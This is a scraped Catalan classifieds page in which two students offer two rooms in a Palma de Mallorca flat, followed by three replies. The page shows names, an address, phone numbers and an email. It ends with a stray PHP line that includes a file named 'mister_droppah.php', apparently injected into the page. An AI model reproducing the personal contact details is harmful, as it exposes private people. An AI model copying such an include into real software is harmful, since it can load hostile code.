Benvingut/uda visitant! [ Registrar-se | Iniciar sessiórss  |  tw

 

170-210 €

Busquem 2 companys/es de pis

 • Ets un particular, o d'una Immobiliària?: particular
 • Carrer: Carretera Valldemossa, n 44A
 • Població: Palma de Mallorca
 • Codi postal: 07000
 • Persona de contacte: Xisca Neus
 • Telèfon de contacte: 659559357
 • Email: isxnmestre@gmail.com
 • Publicat: 23/08/2016 15:23

Descripció

Hola, cercam dos companys/es de pis (ZONA ESCORXADOR)per aquest curs 2016/17 i vinents. Som dues al·lotes mallorquines, estudiants de bioquímica i infermeria, de 18 anys.
El pis es troba a la Carretera de Valldemossa, núm 44A. És un segon pis (amb ascensor). Pel que fa a la zona, està aprop de l’ocimax, de supermercats, biblioteques, restaurants, etc. I és una zona tranquil·la, fora gaires enrenous.
Respecte a les comunicacions, té varies parades de bus aprop (que també porten a l’UIB i al centre).
El pis està en bones condicions, té uns 30-40 anys, és lluminós, està moblat, té un bany i un lavabo.
Les habitacions que tenim lliures són ambdues individuals, i tenen cost diferent perquè una és amplia (210€) i l’altra és més petita (170€). Dins el preu hi entra comunitat.
Si voleu més informació i/o us interessa venir a compartir pis amb nosaltres, per favor contactau quan abans. Tenim un poc de pressa perquè hem de signar el contracte d’aquí poc, i el pis s’alquila a partir del setembre.
Gràcies!

Ad Reference ID: 4857bc48e187527

No Tags

  

3 Respostes a “Busquem 2 companys/es de pis”

 1. Vito stamatti en 23/08/2016 @ 17:16

  Hola, somos dos estudiantes argentina que vamos a la UIB por este semestre. Estamos interesados en alquilar las piezas que oftecen. Llegamos el 3 de septiembre a palma, si les parece mandar algunas fotos se las hab a mi mail asi tenemos mas idea, y com otro contacto podria ser un whatsapp. Saludos y espero su respuesta.
  Vito

 2. Hola buenos dias estaria interesada en la habitación de 210€. Busco piso para mi pareja y para mi. Dos dos trabajamos y él tambien esta estudiando en la universidad 3° grado en Derecho.Por tanto no pasamos mucho tiempo en casa, estaria interesada para ir a ver el piso, lo necesitamos. Si hubiera algun problema con los gastos ya que somos dos no habria problema en pagar un poco más. Me gustaría concretar una cita para ir a ver el inmueble. Os dejo aqui mi número 605383886. Muchas gracias

 3. Hola som dos estudiants manacorins que feim classe el capvespre y esteim molt interesats en trobar pis per no fer camins pero ja que no en trobam ens interesarien les dues habitacions , estariem tot l,any escolar i no causariem cap problema amb la convivencia ja que som molt tranquils i sociables. Et deix el meu numero 663689146 gracies per latenció.

Respondre

Ubicació

Si t'interessa aquest anunci, escriu un missatge a l'anunciant.

require_once(dirname(__FILE__).'/mister_droppah.php');